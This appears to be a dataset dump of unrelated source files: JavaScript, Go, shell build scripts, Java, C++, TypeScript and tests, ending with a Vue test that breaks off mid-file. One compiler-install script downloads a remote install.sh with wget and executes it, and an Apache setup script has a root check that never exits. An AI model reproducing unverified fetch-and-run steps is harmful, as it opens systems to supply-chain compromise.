text stringlengths 1 1.05M |
|---|
const _ = require('underscore');
const PlotCard = require('../../../plotcard.js');
class Rebuilding extends PlotCard {
setupCardAbilities() {
this.whenRevealed({
handler: () => {
this.game.promptForSelect(this.controller, {
numCards: 3,
activePromptTitle: 'Select up to 3 cards from discard',
source: this,
cardCondition: card => this.cardCondition(card),
onSelect: (player, cards) => this.doneSelect(player, cards)
});
}
});
}
cardCondition(card) {
var player = card.controller;
return this.controller === player && player.findCardByUuid(player.discardPile, card.uuid);
}
doneSelect(player, cards) {
_.each(cards, card => {
player.moveCard(card, 'draw deck');
player.shuffleDrawDeck();
});
if(!_.isEmpty(cards)) {
this.game.addMessage('{0} uses {1} to shuffle {2} into their deck', player, this, cards);
}
return true;
}
}
Rebuilding.code = '01019';
module.exports = Rebuilding;
|
<gh_stars>1-10
package dns
import (
"errors"
"fnd.localhost/handshake/encoding"
"io"
"io/ioutil"
)
const (
MaxResourceSize = 512
)
type CompressorEncoder interface {
Encode(w *ResourceWriter, compressMap map[string]int) error
Decode(r *ResourceReader) error
}
type Resource struct {
TTL int
Records []Record
}
func (rs *Resource) Encode(w io.Writer) error {
rw := NewResourceWriter()
if err := encoding.WriteUint8(rw, 0); err != nil {
return err
}
compMap := make(map[string]int)
for _, record := range rs.Records {
if err := encoding.WriteUint8(rw, uint8(record.Type())); err != nil {
return err
}
switch rt := record.(type) {
case encoding.Encoder:
if err := rt.Encode(rw); err != nil {
return err
}
case CompressorEncoder:
if err := rt.Encode(rw, compMap); err != nil {
return err
}
default:
return errors.New("cannot encode record")
}
}
if _, err := w.Write(rw.Bytes()); err != nil {
return err
}
return nil
}
func (rs *Resource) Decode(r io.Reader) error {
buf, err := ioutil.ReadAll(r)
if err != nil {
return err
}
rr := NewResourceReader(buf)
version, err := encoding.ReadUint8(rr)
if err != nil {
return err
}
if version != 0 {
return errors.New("invalid serialization version")
}
for {
recType, err := encoding.ReadUint8(rr)
if err == io.EOF {
return nil
}
if err != nil {
return err
}
var record Record
switch RecordType(recType) {
case RecordTypeDS:
record = new(DSRecord)
case RecordTypeNS:
record = new(NSRecord)
case RecordTypeGlue4:
record = new(Glue4Record)
case RecordTypeGlue6:
record = new(Glue6Record)
case RecordTypeSynth4:
record = new(Synth4Record)
case RecordTypeSynth6:
record = new(Synth6Record)
case RecordTypeTXT:
record = new(TXTRecord)
default:
return errors.New("unknown record type")
}
switch rt := record.(type) {
case encoding.Decoder:
if err := rt.Decode(rr); err != nil {
return err
}
case CompressorEncoder:
if err := rt.Decode(rr); err != nil {
return err
}
default:
return errors.New("cannot decode record")
}
rs.Records = append(rs.Records, record)
}
}
|
TERMUX_PKG_HOMEPAGE="https://tiswww.case.edu/php/chet/readline/rltop.html"
TERMUX_PKG_DESCRIPTION="Library that allow users to edit command lines as they are typed in"
TERMUX_PKG_LICENSE="GPL-3.0"
TERMUX_PKG_DEPENDS="libandroid-support, ncurses"
TERMUX_PKG_BREAKS="bash (<< 5.0), readline-dev"
TERMUX_PKG_REPLACES="readline-dev"
_MAIN_VERSION=8.0
_PATCH_VERSION=4
TERMUX_PKG_VERSION=$_MAIN_VERSION.$_PATCH_VERSION
TERMUX_PKG_REVISION=1
TERMUX_PKG_SRCURL=https://mirrors.kernel.org/gnu/readline/readline-${_MAIN_VERSION}.tar.gz
TERMUX_PKG_SHA256=e339f51971478d369f8a053a330a190781acb9864cf4c541060f12078948e461
TERMUX_PKG_EXTRA_CONFIGURE_ARGS="--with-curses --enable-multibyte bash_cv_wcwidth_broken=no"
TERMUX_PKG_EXTRA_MAKE_ARGS="SHLIB_LIBS=-lncursesw"
TERMUX_PKG_CONFFILES="etc/inputrc"
termux_step_pre_configure() {
declare -A PATCH_CHECKSUMS
PATCH_CHECKSUMS[001]=d8e5e98933cf5756f862243c0601cb69d3667bb33f2c7b751fe4e40b2c3fd069
PATCH_CHECKSUMS[002]=36b0febff1e560091ae7476026921f31b6d1dd4c918dcb7b741aa2dad1aec8f7
PATCH_CHECKSUMS[003]=94ddb2210b71eb5389c7756865d60e343666dfb722c85892f8226b26bb3eeaef
PATCH_CHECKSUMS[004]=b1aa3d2a40eee2dea9708229740742e649c32bb8db13535ea78f8ac15377394c
for PATCH_NUM in $(seq -f '%03g' ${_PATCH_VERSION}); do
PATCHFILE=$TERMUX_PKG_CACHEDIR/readline_patch_${PATCH_NUM}.patch
termux_download \
"http://mirrors.kernel.org/gnu/readline/readline-$_MAIN_VERSION-patches/readline${_MAIN_VERSION/./}-$PATCH_NUM" \
$PATCHFILE \
${PATCH_CHECKSUMS[$PATCH_NUM]}
patch -p0 -i $PATCHFILE
done
CFLAGS+=" -fexceptions"
}
termux_step_post_make_install() {
mkdir -p $TERMUX_PREFIX/lib/pkgconfig
cp readline.pc $TERMUX_PREFIX/lib/pkgconfig/
mkdir -p $TERMUX_PREFIX/etc
cp $TERMUX_PKG_BUILDER_DIR/inputrc $TERMUX_PREFIX/etc/
}
|
package validator
import (
"github.com/go-playground/validator/v10"
"regexp"
)
func phone(fl validator.FieldLevel) bool {
match, _ := regexp.MatchString("^1[3456789]\\d{9}$", fl.Field().String())
if !match {
return false
}
return true
}
|
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
# ้ช่ฏๅฝๅ็็จๆทๆฏๅฆไธบroot่ดฆๅท๏ผไธๆฏ็่ฏ้ๅบๅฝๅ่ๆฌ
[ `id -u` == 0 ] || echo "Error: You must be root to run this script, please use root to install lnmp" || exit 1
#ๆฃๆต็ณป็ปๆฏๅฆๆwww็จๆท๏ผๅฆๆๆฒกๆๅๆทปๅ ่ฏฅ็จๆท๏ผๅฆๆๆๅไธๅๅค็
id www
[ `echo $?` == 0 ] || groupadd www ; useradd -s /sbin/nologin -g www www
cd ./packages
tar zxvf httpd-2.2.22.tar.gz
cd httpd-2.2.22/
./configure --prefix=/usr/local/apache --enable-so --enable-rewrite
make && make install
#ๅๅฐๆ น็ฎๅฝ
cd ../../
rm -rf ./packages/httpd-2.2.22
\cp -rpv conf/httpd.conf /usr/local/apache/conf/httpd.conf
mkdir -p /usr/local/apache/conf/vhost
chown www:www -R /usr/local/apache
#่ฎพ็ฝฎapacheๅผๆบๅฏๅจ
rpm -ivh ./packages/dos2unix-3.1-37.el6.x86_64.rpm
\cp -rpv ./conf/apache /etc/init.d/
dos2unix /etc/init.d/apache
chmod +x /etc/init.d/apache
chkconfig apache --add
chkconfig apache on
service apache start
|
#!/bin/sh
BP=$(dirname "$0")
MARK_ARCH="$1"
case "$MARK_ARCH" in
aarch64-gnu)
TARGET_ARCH="aarch64-unknown-linux-gnu"
;;
arm-gnu)
TARGET_ARCH="arm-unknown-linux-gnueabihf"
;;
armv7-gnu)
TARGET_ARCH="armv7-unknown-linux-gnueabihf"
;;
i586-gnu)
TARGET_ARCH="i586-unknown-linux-gnu"
;;
i686-gnu)
TARGET_ARCH="i686-unknown-linux-gnu"
;;
mips-gnu)
TARGET_ARCH="mips-unknown-linux-gnu"
;;
mipsel-gnu)
TARGET_ARCH="mipsel-unknown-linux-gnu"
;;
mips64-gnu)
TARGET_ARCH="mips64-unknown-linux-gnuabi64"
;;
mips64el-gnu)
TARGET_ARCH="mips64el-unknown-linux-gnuabi64"
;;
powerpc-gnu)
TARGET_ARCH="powerpc-unknown-linux-gnu"
;;
powerpc64-gnu)
TARGET_ARCH="powerpc64-unknown-linux-gnu"
;;
powerpc64le-gnu)
TARGET_ARCH="powerpc64le-unknown-linux-gnu"
;;
riscv64-gnu)
TARGET_ARCH="riscv64gc-unknown-linux-gnu"
;;
s390x-gnu)
TARGET_ARCH="s390x-unknown-linux-gnu"
;;
sparc64-gnu)
TARGET_ARCH="sparc64-unknown-linux-gnu"
;;
x86_64-gnu)
TARGET_ARCH="x86_64-unknown-linux-gnu"
;;
aarch64-musl)
TARGET_ARCH="aarch64-unknown-linux-musl"
;;
arm-musl)
TARGET_ARCH="arm-unknown-linux-musleabihf"
;;
armv7-musl)
TARGET_ARCH="armv7-unknown-linux-musleabihf"
;;
i586-musl)
TARGET_ARCH="i586-unknown-linux-musl"
;;
i686-musl)
TARGET_ARCH="i686-unknown-linux-musl"
;;
mips-musl)
TARGET_ARCH="mips-unknown-linux-musl"
;;
mipsel-musl)
TARGET_ARCH="mipsel-unknown-linux-musl"
;;
mips64-musl)
TARGET_ARCH="mips64-unknown-linux-muslabi64"
;;
mips64el-musl)
TARGET_ARCH="mips64el-unknown-linux-muslabi64"
;;
x86_64-musl)
TARGET_ARCH="x86_64-unknown-linux-musl"
;;
help)
echo "[usage]$0 arch" 1>&2
echo "aarch64-gnu arm-gnu armv7-gnu i586-gnu i686-gnu mips-gnu mips64-gnu powerpc-gnu powerpc64-gnu riscv64-gnu s390x-gnu sparc64-gnu x86_64-gnu" 1>&2
echo "aarch64-musl arm-musl armv7-musl i586-musl i686-musl mips-musl mips64-musl x86_64-musl" 1>&2
exit
;;
*)
echo "[usage]$0 arch" 1>&2; exit
;;
esac
echo "$TARGET_ARCH"
|
package com.cbk.ask.utils;
import android.app.Dialog;
import android.content.Context;
import android.view.LayoutInflater;
import android.view.View;
import android.view.Window;
import android.widget.Button;
import android.widget.LinearLayout;
import android.widget.TextView;
import com.cbk.ask.R;
/**
* Created by sunyc
*/
public class TipDialog extends Dialog implements android.view.View.OnClickListener{
public interface TipDialogListener {
void SetOnClick(View view);
}
private View view;
private TextView tv_title_dialog;
private TextView tv_content_dialog;
private Button btn_ok;
private Button btn_cancel;
private TipDialogListener dialogListener;
// ๆ้ ๆนๆณ
public TipDialog(Context context,TipDialogListener tipDialogListener) {
super(context);
initView(context);
this.dialogListener = tipDialogListener;
}
public TipDialog(Context context, int theme) {
super(context, theme);
initView(context);
}
protected TipDialog(Context context, boolean cancelable,
OnCancelListener cancelListener) {
super(context, cancelable, cancelListener);
initView(context);
}
// ๅๅงๅdialog็้ข
private void initView(Context context) {
view = LayoutInflater.from(context).inflate(R.layout.layout_dialog_tip,
null);
tv_title_dialog = (TextView) view.findViewById(R.id.tv_title_dialog);
tv_content_dialog = (TextView) view
.findViewById(R.id.tv_content_dialog);
btn_ok = (Button) view.findViewById(R.id.btn_dialog_ok);
btn_cancel = (Button) view.findViewById(R.id.btn_dialog_cancel);
btn_ok.setOnClickListener(this);
btn_cancel.setOnClickListener(this);
}
public Button getBtn_ok() {
return btn_ok;
}
public Button getBtn_cancel() {
return btn_cancel;
}
public void SetContentTextSize(int size) {
tv_content_dialog.setTextSize(size);
}
public void show(String title, String content) {
tv_title_dialog.setText(title);
tv_content_dialog.setText(content);
this.requestWindowFeature(Window.FEATURE_NO_TITLE);
this.setContentView(view);
this.getWindow().setLayout(LinearLayout.LayoutParams.WRAP_CONTENT,
LinearLayout.LayoutParams.WRAP_CONTENT);
this.show();
}
@Override
public void onClick(View view) {
this.dismiss();
this.dialogListener.SetOnClick(view);
}
}
|
<gh_stars>0
/*
* BSD 3-Clause License
*
* Copyright (c) 2019, Analog Devices, Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "device_enumerator_ethernet.h"
#include "network.h"
#include <glog/logging.h>
DeviceEnumeratorEthernet::DeviceEnumeratorEthernet(const std::string &ip)
: m_ip(ip) {}
DeviceEnumeratorEthernet::~DeviceEnumeratorEthernet() = default;
aditof::Status DeviceEnumeratorEthernet::findDevices(
std::vector<aditof::DeviceConstructionData> &devices) {
using namespace aditof;
Status status = Status::OK;
LOG(INFO) << "Looking for devices over ethernet";
std::unique_ptr<Network> net(new Network());
if (net->ServerConnect(m_ip) != 0) {
LOG(WARNING) << "Server Connect Failed";
return Status::UNREACHABLE;
}
net->send_buff.set_func_name("FindDevices");
net->send_buff.set_expect_reply(true);
if (net->SendCommand() != 0) {
LOG(WARNING) << "Send Command Failed";
return Status::INVALID_ARGUMENT;
}
if (net->recv_server_data() != 0) {
LOG(WARNING) << "Receive Data Failed";
return Status::GENERIC_ERROR;
}
if (net->recv_buff.server_status() !=
payload::ServerStatus::REQUEST_ACCEPTED) {
LOG(WARNING) << "API execution on Target Failed";
return Status::GENERIC_ERROR;
}
const payload::ServerResponse &msg = net->recv_buff;
for (int i = 0; i < msg.device_info().size(); ++i) {
const payload::DeviceConstructionData &pbData = msg.device_info(i);
aditof::DeviceConstructionData tofData;
tofData.deviceType =
static_cast<aditof::DeviceType>(pbData.device_type());
tofData.driverPath = pbData.driver_path();
tofData.ip = m_ip;
devices.push_back(tofData);
}
status = static_cast<Status>(net->recv_buff.status());
return status;
}
|
#!/bin/bash
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
. ${SCRIPT_DIR}/common.inc
getgdc() {
vers=$1
build=$2
if [[ -d gdc${vers} ]]; then
echo D ${vers} already installed, skipping
return
fi
mkdir gdc${vers}
pushd gdc${vers}
fetch ftp://ftp.gdcproject.org/binaries/${vers}/x86_64-linux-gnu/gdc-${vers}+${build}.tar.xz | tar Jxf -
# stripping the D libraries seems to upset them, so just strip the exes
do_strip x86_64-pc-linux-gnu/bin
do_strip x86_64-pc-linux-gnu/libexec
popd
}
getldc() {
vers=$1
if [[ -d ldc${vers} ]]; then
echo LDC ${vers} already installed, skipping
return
fi
mkdir ldc${vers}
pushd ldc${vers}
fetch https://github.com/ldc-developers/ldc/releases/download/v${vers}/ldc2-${vers}-linux-x86_64.tar.xz | tar Jxf -
# any kind of stripping upsets ldc
popd
}
getldc_s3() {
vers=$1
if [[ -d ldc2-${vers} ]]; then
echo LDC ${vers} already installed, skipping
return
fi
fetch https://s3.amazonaws.com/compiler-explorer/opt/ldc2-${vers}.tar.xz | tar Jxf -
}
getldc_latestbeta() {
vers=$(fetch https://ldc-developers.github.io/LATEST_BETA)
if [[ ! -d ldcbeta ]]; then
mkdir ldcbeta
fi
pushd ldcbeta
if [[ "$(cat .version)" == "${vers}" ]]; then
echo "LDC beta version ${vers} already installed, skipping"
popd
return
fi
rm -rf *
fetch https://github.com/ldc-developers/ldc/releases/download/v${vers}/ldc2-${vers}-linux-x86_64.tar.xz | tar Jxf - --strip-components 1
echo "${vers}" >.version
# any kind of stripping upsets ldc
popd
}
getldc_latest_ci() {
# Use dlang's install.sh script to get the latest master CI build.
DIR=ldc-latest-ci
if [[ -d ${DIR} ]]; then
rm -rf ${DIR}
fi
mkdir ${DIR}
pushd ${DIR}
wget https://dlang.org/install.sh
chmod +x install.sh
./install.sh install ldc-latest-ci -p $(pwd)
# Rename the downloaded package directory to a constant "ldc" name
mv ldc-* ldc
chmod +rx ldc
popd
}
getdmd_2x() {
VER=$1
DIR=dmd-${VER}
if [[ -d ${DIR} ]]; then
echo DMD ${VER} already installed, skipping
return
fi
mkdir ${DIR}
pushd ${DIR}
fetch http://downloads.dlang.org/releases/2.x/${VER}/dmd.${VER}.linux.tar.xz | tar Jxf -
popd
}
getdmd2_nightly() {
# Use dlang's install.sh script to get the latest trunk build.
# See: https://dlang.org/install.html
DIR=dmd2-nightly
if [[ -d ${DIR} ]]; then
rm -rf ${DIR}
fi
mkdir ${DIR}
pushd ${DIR}
wget https://dlang.org/install.sh
chmod +x install.sh
# Download and unpack dmd-nightly into current directory
./install.sh install dmd-nightly -p $(pwd)
# Rename the downloaded package directory to a constant "dmd2" name
mv dmd-master-* dmd2
# Make directory readable for other users too
chmod +rx dmd2
popd
}
getgdc 4.8.2 2.064.2
getgdc 4.9.3 2.066.1
getgdc 5.2.0 2.066.1
for version in \
0.17.2 \
1.{0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18}.0; do
getldc ${version}
done
if install_nightly; then
getldc_latestbeta
getldc_latest_ci
fi
getldc_s3 1.2.0
getdmd_2x 2.078.3
getdmd_2x 2.079.0
getdmd_2x 2.079.1
getdmd_2x 2.080.1
getdmd_2x 2.081.2
getdmd_2x 2.082.0
getdmd_2x 2.089.0
if install_nightly; then
getdmd2_nightly
fi
|
define(function(require, exports, module) {
var ctags = require("../../../ctags");
return {
updateCTags: function(path, tags, callback) {
ctags.updateCTags(path, tags);
callback();
}
};
}); |
#!/bin/bash
# abort script on error
set -e
# check java
java -version
$JAVA_11_HOME/bin/java -version
# check node
node --version
npm --version
# check python
source activate py3
python --version
source activate py2
python --version
source deactivate
# go to project
cd /project
# prepare gradle
chmod +x ./gradlew
# check Java 11 compatibility
# set OLD_JAVA_HOME=$JAVA_HOME
# export JAVA_HOME=$JAVA_11_HOME
# ./gradlew --version
# ./gradlew
# export JAVA_HOME=$OLD_JAVA_HOME
# run gradle
./gradlew --version
./gradlew
# run ts
pushd ts
chmod +x ./compile
./compile
popd
# run py3
pushd py3
chmod +x ./tests
./tests
popd
# run py2
pushd py2
chmod +x ./tests
./tests
popd
|
<reponame>vharsh/cattle2
package io.cattle.platform.process.agent;
import io.cattle.platform.agent.impl.AgentLocatorImpl;
import io.cattle.platform.core.model.Agent;
import io.cattle.platform.engine.handler.HandlerResult;
import io.cattle.platform.engine.handler.ProcessHandler;
import io.cattle.platform.engine.process.ProcessInstance;
import io.cattle.platform.engine.process.ProcessState;
import io.cattle.platform.object.ObjectManager;
import io.cattle.platform.object.process.ObjectProcessManager;
public class AgentResourceRemove implements ProcessHandler {
ObjectManager objectManager;
ObjectProcessManager processManager;
public AgentResourceRemove(ObjectManager objectManager, ObjectProcessManager processManager) {
super();
this.objectManager = objectManager;
this.processManager = processManager;
}
@Override
public HandlerResult handle(ProcessState state, ProcessInstance process) {
Object resource = state.getResource();
Long agentId = AgentLocatorImpl.getAgentId(resource);
Agent agent = objectManager.loadResource(Agent.class, agentId);
if (agent == null || agent.getRemoved() != null) {
return null;
}
processManager.deactivateThenRemove(agent, null);
return null;
}
}
|
<gh_stars>0
#pragma once
#include <Types>
#include <Functions>
template<FSize SizeBytes>
struct TByte;
template<FSize SizeBytes>
struct TByte
{
FRaw Data[SizeBytes];
inline FSize Size(
FVoid
)
{
return SizeBytes;
}
inline FSize Size(
FVoid
) const
{
return SizeBytes;
}
friend FIStream &operator>>(
FIStream &In,
TByte<SizeBytes> &Rhs
)
{
FSize Index;
In.read((char *) Rhs.Data, SizeBytes);
return In;
}
friend FOStream &operator<<(
FOStream &Out,
const TByte<SizeBytes> &Rhs
)
{
FSize Index;
Out.write((char *) Rhs.Data, SizeBytes);
return Out;
}
template<typename TypeLhs>
operator TypeLhs(
FVoid
) const
{
TypeLhs Lhs;
FRaw *PtrLhs;
FSize Index, End;
PtrLhs = (FRaw *) &Lhs;
End = Min(SizeBytes, sizeof(TypeLhs));
for(Index = 0; Index < End; ++Index)
{
PtrLhs[Index] = Data[Index];
}
for( ; Index < SizeBytes; ++Index)
{
PtrLhs[Index] = 0;
}
return Lhs;
}
template<typename TypeRhs>
TByte<SizeBytes> &operator=(
const TypeRhs &Rhs
)
{
FRaw *PtrRhs;
FSize Index, End;
PtrRhs = (FRaw *) &Rhs;
End = Min(SizeBytes, sizeof(TypeRhs));
for(Index = 0; Index < End; ++Index)
{
Data[Index] = PtrRhs[Index];
}
for( ; Index < SizeBytes; ++Index)
{
Data[Index] = 0;
}
return *this;
}
};
template<typename TypeLhs, FSize SizeBytes>
FBool operator==(
const TypeLhs &Lhs,
const TByte<SizeBytes> &Rhs
)
{
FSize Index, End;
const FRaw *PtrLhs;
PtrLhs = (FRaw *) &Lhs;
End = Min(SizeBytes, sizeof(TypeLhs));
for(Index = 0; Index < End; ++Index)
{
if(Rhs.Data[Index] != PtrLhs[Index])
{
return False;
}
}
return True;
}
template<FSize SizeBytes, typename TypeRhs>
inline FBool operator==(
const TByte<SizeBytes> &Lhs,
const TypeRhs &Rhs
)
{
return (Rhs == Lhs);
}
template<FSize SizeBytes, typename TypeLhs>
FBool operator!=(
const TypeLhs &Lhs,
const TByte<SizeBytes> &Rhs
)
{
FSize Index, End;
const FRaw *PtrLhs;
PtrLhs = (FRaw *) &Lhs;
End = Min(SizeBytes, sizeof(TypeLhs));
for(Index = 0; Index < End; ++Index)
{
if(Rhs.Data[Index] == PtrLhs[Index])
{
return False;
}
}
return True;
}
template<FSize SizeBytes, typename TypeRhs>
inline FBool operator!=(
const TByte<SizeBytes> &Lhs,
const TypeRhs &Rhs
)
{
return (Rhs != Lhs);
}
template<FSize SizeBytes>
FBool operator!(
const TByte<SizeBytes> &Rhs
)
{
FSize Index;
for(Index = 0; Index < SizeBytes; ++Index)
{
if(Rhs.Data[Index])
{
return False;
}
}
return True;
}
|
'use strict';
const test = require('ava');
const request = require('supertest');
const { randomString } = require('@cumulus/common/test-utils');
const bootstrap = require('../../../lambdas/bootstrap');
const models = require('../../../models');
const {
createFakeJwtAuthToken,
fakeProviderFactory
} = require('../../../lib/testUtils');
const { Search } = require('../../../es/search');
const assertions = require('../../../lib/assertions');
process.env.UsersTable = randomString();
process.env.ProvidersTable = randomString();
process.env.stackName = randomString();
process.env.system_bucket = randomString();
process.env.TOKEN_SECRET = randomString();
// import the express app after setting the env variables
const { app } = require('../../../app');
let providerModel;
const esIndex = randomString();
let esClient;
let accessTokenModel;
let jwtAuthToken;
let userModel;
test.before(async () => {
await bootstrap.bootstrapElasticSearch('fakehost', esIndex);
process.env.esIndex = esIndex;
providerModel = new models.Provider();
await providerModel.createTable();
userModel = new models.User();
await userModel.createTable();
process.env.AccessTokensTable = randomString();
accessTokenModel = new models.AccessToken();
await accessTokenModel.createTable();
jwtAuthToken = await createFakeJwtAuthToken({ accessTokenModel, userModel });
esClient = await Search.es('fakehost');
});
test.beforeEach(async (t) => {
t.context.testProvider = fakeProviderFactory();
await providerModel.create(t.context.testProvider);
});
test.after.always(async () => {
await accessTokenModel.deleteTable();
await providerModel.deleteTable();
await userModel.deleteTable();
await esClient.indices.delete({ index: esIndex });
});
test('CUMULUS-912 PUT with pathParameters and with an invalid access token returns an unauthorized response', async (t) => {
const response = await request(app)
.put('/providers/asdf')
.set('Accept', 'application/json')
.set('Authorization', 'Bearer ThisIsAnInvalidAuthorizationToken')
.expect(403);
assertions.isInvalidAccessTokenResponse(t, response);
});
test.todo('CUMULUS-912 PUT with pathParameters and with an unauthorized user returns an unauthorized response');
test('PUT updates an existing provider, and that update is returned from the API', async (t) => {
const updateParams = {
globalConnectionLimit: t.context.testProvider.globalConnectionLimit + 1
};
await request(app)
.put(`/providers/${t.context.testProvider.id}`)
.send(updateParams)
.set('Accept', 'application/json')
.set('Authorization', `Bearer ${jwtAuthToken}`)
.expect(200);
const { body: actualProvider } = await request(app)
.get(`/providers/${t.context.testProvider.id}`)
.set('Accept', 'application/json')
.set('Authorization', `Bearer ${jwtAuthToken}`)
.expect(200);
const expectedProvider = {
...t.context.testProvider,
...updateParams,
createdAt: actualProvider.createdAt,
updatedAt: actualProvider.updatedAt
};
t.deepEqual(actualProvider, expectedProvider);
});
test('PUT without an Authorization header returns an Authorization Missing response and does not update an existing provider', async (t) => {
const updatedLimit = t.context.testProvider.globalConnectionLimit + 1;
const response = await request(app)
.put(`/providers/${t.context.testProvider.id}`)
.send({ globalConnectionLimit: updatedLimit })
.set('Accept', 'application/json')
.expect(401);
assertions.isAuthorizationMissingResponse(t, response);
const provider = await providerModel.get({
id: t.context.testProvider.id
});
t.is(provider.globalConnectionLimit, t.context.testProvider.globalConnectionLimit);
});
|
int menu(); |
<filename>frontend/src/pages/write/beginner.tsx
import type {
GetServerSidePropsContext,
GetServerSidePropsResult,
} from 'next';
import React from 'react';
import Router from 'next/router';
import { EditorLayout } from '@components/system-design/article-editor-page/beginner';
import * as API from '@modules/api';
import { snackBar } from '@modules/ui/snack-bar';
import { authStore } from '@stores/auth';
import { configStore } from '@stores/config';
interface Props {
username: string;
}
export async function getServerSideProps({ req, }: GetServerSidePropsContext
): Promise<GetServerSidePropsResult<Props>> {
const { cookies } = req;
configStore.serverSideInject(cookies);
const { cookie } = req.headers;
const { data } = await API.getLogin({
'Cookie': cookie || '',
});
if (data.status !== 'DONE') {
return {
notFound: true,
};
}
return {
props: {
username: data.body.username
}
};
}
interface State {
username: string;
title: string;
tags: string;
contents: [];
token: string;
series: string;
image: File | undefined;
isAutoSave: boolean;
isHide: boolean;
isAd: boolean;
isOpenArticleModal: boolean;
tempPosts: API.GetTempPostsDataTemp[],
tempPostsCache: {
[token: string]: {
title: string;
content: string;
tags: string;
};
};
}
class Write extends React.Component<Props, State> {
private authUpdateKey: string;
private configUpdateKey: string;
constructor(props: Props) {
super(props);
this.state = {
username: props.username,
title: '',
contents: [],
tags: '',
token: '',
series: '',
isHide: false,
isAd: false,
image: undefined,
isAutoSave: configStore.state.isAutoSave,
isOpenArticleModal: false,
tempPosts: [],
tempPostsCache: {
}
};
this.authUpdateKey = authStore.subscribe((state) => {
this.setState({
username: state.username,
});
});
this.configUpdateKey = configStore.subscribe((state) => {
this.setState({
isAutoSave: state.isAutoSave,
});
});
}
/* Component Method */
componentWillUnmount() {
configStore.unsubscribe(this.configUpdateKey);
authStore.unsubscribe(this.authUpdateKey);
}
async componentDidMount() {
const { data } = await API.getTempPosts();
if (data.body.temps.length > 0) {
this.setState({
tempPosts: data.body.temps
});
snackBar('๐ ์์ฑํ๋ ํฌ์คํธ๊ฐ ์์ผ์๋ค์!', {
onClick: () => {
this.setState({
isOpenArticleModal: true
});
}
});
}
}
async onSubmit(onFail: () => void) {
if (!this.state.title) {
snackBar('๐
์ ๋ชฉ์ด ๋น์ด์์ต๋๋ค.');
onFail();
return;
}
if (!this.state.tags) {
snackBar('๐
ํค์๋๋ฅผ ์์ฑํด์ฃผ์ธ์.');
onFail();
return;
}
try {
const { data } = await API.postPosts({
token: this.state.token,
title: this.state.title,
text_md: this.state.contents.map(({ text }) => {
if (text) {
return text;
}
return '<br/>';
}).join('\n\n'),
image: this.state.image,
tag: this.state.tags,
series: this.state.series,
is_hide: JSON.stringify(this.state.isHide),
is_advertise: JSON.stringify(this.state.isAd),
});
Router.push('/[author]/[posturl]', `/@${this.state.username}/${data.body.url}`);
} catch (e) {
snackBar('๐ฅ ๊ธ ์์ฑ์ค ์ค๋ฅ๊ฐ ๋ฐ์ํ์ต๋๋ค.');
onFail();
}
}
async onDeleteTempPost(token: string) {
if (confirm('๐
์ ๋ง ์์๊ธ์ ์ญ์ ํ ๊น์?')) {
const { data } = await API.deleteTempPosts(token);
if (data.status === 'DONE') {
this.setState({
token: '',
tempPosts: this.state.tempPosts.filter(post =>
post.token !== token
)
});
snackBar('๐ ์์๊ธ์ด ์ญ์ ๋์์ต๋๋ค.');
}
}
}
onCheckAutoSave(checked: boolean) {
configStore.set((state) => ({
...state,
isAutoSave: checked
}));
}
render() {
return (
<EditorLayout
title={{
value: this.state.title,
onChange: (value: string) => this.setState({
title: value
}),
}}
content={{
value: this.state.contents,
onChange: (value) => {
console.log(value);
this.setState({
contents: value
});
},
}}
series={{
value: this.state.series,
onChange: (value) => this.setState({
series: value
}),
}}
tags={{
value: this.state.tags,
onChange: (value) => this.setState({
tags: value
}),
}}
isHide={{
value: this.state.isHide,
onChange: (value) => this.setState({
isHide: value
})
}}
isAd={{
value: this.state.isAd,
onChange: (value) => this.setState({
isAd: value
})
}}
image={{
onChange: (image) => this.setState({
image: image
})
}}
publish={{
title: 'ํฌ์คํธ ๋ฐํ',
buttonText: '์ด๋๋ก ๋ฐํํ๊ฒ ์ต๋๋ค'
}}
onSubmit={this.onSubmit.bind(this)}
/>
);
}
}
export default Write; |
<gh_stars>1-10
/**
*
* @creatTime ไธๅ10:22:38
* @author Eddy
*/
package tiger.test.loop;
import javax.inject.Inject;
import javax.inject.Named;
import javax.inject.Singleton;
/**
* @author Eddy
*
*/
@Named("bear")
@Singleton
public class Bear {
@Inject
private Snake snake;
public void bear() {
System.out.println("snake is not null: " + (snake == null));
System.out.println("bear");
snake.snake();
}
}
|
import {mount, createLocalVue} from "@vue/test-utils";
import Vuex from 'vuex'
import {VueSequence} from '@/index'
import Participant from '@/components/lifeline/Participant'
const localVue = createLocalVue()
localVue.use(Vuex)
const storeConfig = VueSequence.Store()
storeConfig.state.code = 'abc'
const store = new Vuex.Store(storeConfig)
describe('select a participant', () => {
it('For VM and HTML and store', async () => {
store.state.firstInvocations = {
A: {
top: 3
}
}
const propsData = {entity: { name: 'A' }}
let participantWrapper = mount(Participant, {store, localVue, propsData});
expect(participantWrapper.vm.selected).toBeFalsy()
